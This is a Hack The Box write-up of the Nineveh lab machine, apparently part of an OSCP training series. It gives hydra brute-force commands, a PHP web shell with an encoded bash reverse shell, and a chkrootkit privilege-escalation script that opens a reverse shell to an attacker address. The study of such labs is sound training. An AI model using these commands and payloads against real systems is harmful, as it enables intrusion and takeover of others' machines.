Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Nineveh

Initial Foothold

Using gobuster on port 80, we find a login at 10.10.10.43/department.

From the error messages, we can see that admin is a valid username, as if we type a different one it says "Invalid Username".

Looking at the source code, we see that the it is using MySQL.

Going to the HTTPS page on port 443 and looking at the certificate we see a hostname: nineveh.htb. It just redirects to the webpage on port 80.

Using gobuster on port 443, we find a login at https://10.10.10.43/db.

Bruteforce

We can try bruteforcing the logins:

1. hydra -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 http-post-form '/department/login.php:username=^USER^&password=^PASS^:invalid' -l admin -f
2. hydra -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 https-post-form '/db:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect' -l admin -f

Creds for http login: admin:1q2w3e4r5t. Password for the https login is: password123.

There is an exploit for phpLiteAdmin searchsploit phpliteadmin: 24044.txt

It looks like if we create a database with a php extension, we can execute code from it. To access the database, we can use the http server that looks like has access to files on the system. It also seems like it fails as soon as the name does not match ninevehNotes, so we need to name our database something that contains that name.

1. We need to create a database that contains the name ninevehNotes and has a php for example: ninevehNotes_test.php.
2. Create a table with any name.
3. Create a new text field within the table. Paste the following as the name of the field (turns out it also works as the default value): <?php system("echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zMS8xMjM0NSAwPiYxJw== | base64 -d | bash");?>
4. Set up a listener: ncat lnvp 12345.
5. From the http site, visit: 10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes_test.php.

Note: That base64-encoded payload contains a bash reverse shell for 10.10.14.31:12345. To generate a new payload: simply do: echo -n "bash -c 'bash -i >& /dev/tcp/10.10.14.31/12345' | base64".

User

After running lse.sh, we see that we can read /var/mail/amrois:

From root@nineveh.htb  Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
        id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)

Amrois! please knock the door next time! 571 290 911

It seems like we have to do port knocking. For this we can use the tool knock, which comes bundled with the daemon knockd: knock 10.10.10.43 571:tcp 290:tcp 911:tcp && ssh amrois@10.10.10.43

We do not get access, we need an ssh key.

CTF Nonsense

Poking around the directories we stumble upon a peculiar name: /var/www/ssl/secure_notes. Navigating to it we get a giant image.

Download the image: wget https://nineveh.htb/secure_notes/nineveh.png --no-check-certificate. Extract hidden stuff: binwalk -e nineveh.png. We get a private and a public key.

We can now ssh in:

1. chmod +600 nineveh.priv.
2. knock 10.10.10.43 571:tcp 290:tcp 911:tcp && ssh -i nineveh.priv amrois@10.10.10.43

Root

Looking around we find that we have write access over a shell script: /usr/sbin/report-reset.sh. Which points us to a weird folder /report.

Inside this folder, there are few text files we some weird contents. Googling one of the lines gives us the answer: it is output produced by chkrootkit.

Using searchsploit we find a privilege escalation exploit: searchsploit -m 33899.txt.

Following the instructions, we create the file /tmp/update with the following contents:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.31/7777 0>&1

Make it executable: chmod +x /tmp/update and set up the listener: ncat -lnvp 7777. From here, just wait for the shell to pop up. The file should be executed each minute.